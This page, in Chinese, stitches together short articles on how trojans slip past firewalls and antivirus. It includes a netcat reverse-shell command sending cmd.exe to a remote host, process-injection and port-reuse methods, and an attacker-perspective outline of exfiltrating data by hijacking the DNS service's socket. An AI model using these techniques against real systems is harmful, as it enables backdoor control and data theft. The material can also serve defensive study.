木马如何穿过你的防火墙?
rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?) 2. 端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了) 道高一尺,魔高一丈.: 你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截) 使用工具netcat就可以穿刺这种防火墙 : nc -e cmd.exe 远程ip 远程监听port 随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等 典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac ) 还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活) 典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制) 典型的如ntrootkit采用了自定义协议技术. 3.应用程序筛选.(只允许特定程序访问网络) 木马也不甘落后,自己不能访问网络,只好寄人篱下: 进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入 现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等. 4.协议筛选. (例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-) 使用这种技术的有pcshare(使用双向http隧道传输) 5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了: 比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去! 可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵 6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密. 但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用. 同时,综合利用以上对抗技术的木马也不鲜见了.木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展.呵呵
黑客如何跳过防火墙
穿透防火墙的数据传输方法
通常,在我们为目标主机安放好了后门需要将数据传输出去时,主机上的防火墙都会让我们遇到一些不大不小的麻烦。如果为我们自己的进程开一个端口(甚至是新建套接字),那么大部分的防火墙都会将其拦截。有什么方法能“穿透”这些防火墙呢?
下面我为您介绍一种“洞穿”防火墙小规模传输重要数据的方法。不过,不推荐您在其它情况下使用该方法。
其实我的思路很简单,既然防火墙会拦截未验证进程而放行已验证进程的数据传输,那我们就将其它进程中允许数据传输的套接字句柄拿为已用。具体过程如下:
1、找出目标进程;
2、找出SOCKET句柄;
2、用DuplicateHandle()函数将其SOCKET转换为能被自己使用;
3、用转换后的SOCKET进行数据传输。
上面的过程写的很简单,但是实现起来还存在一些问题(后面再做讨论)。另外,从上面的实现方法中也可以看到一些很难控制的地方,比如在目标进程的SOCKET不能是TCP,只能是UDP,因为TCP的句柄已经跟外面建立了连接。同时,针对不同系统不同进程我们也很难定位一个稳定的进程SOCKET。
看到这么多“麻烦”,你有点泄气了对不对?不要着急,再想一想,其实我们有一条真正通向罗马的“黄金大道”。我们都知道只要一台计算机联上了网络,那么有一种数据传输是肯定不会被拦截的,不错,就是DNS!你能想像域名解析数据都被拦截所造成的后果吗?既然DNS是不会被拦的,而且它又是UDP传输,我们就从它“开刀”。
本文为您提供了一个通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子。
查看详细源代码RIPT。
木马是怎么绕过防火墙跟杀毒的?
病毒免杀原理,每个病毒都有特征码,不同的杀软针对同一个病毒的特征吗也不同。免杀就是通过对特征码的修改或填充屏蔽杀软主动防御。而在杀软特征库更新后,免杀失效。
所谓的加壳,只是一种最普通的免杀方法,但加壳后很可能影响病毒的功能,所以一般不采用加壳的办法
这就是过杀软的原因
二有些病毒会用隧道加密技术对控制端加密,防火墙无法拦截,在进入电脑后,运行一遍程序,屏蔽IP连接,。防火墙便不会报警
但这类病毒较少,常见病毒一般不会拥有此项功能,所以尽可放心
这是过防火墙的原理
0条大神的评论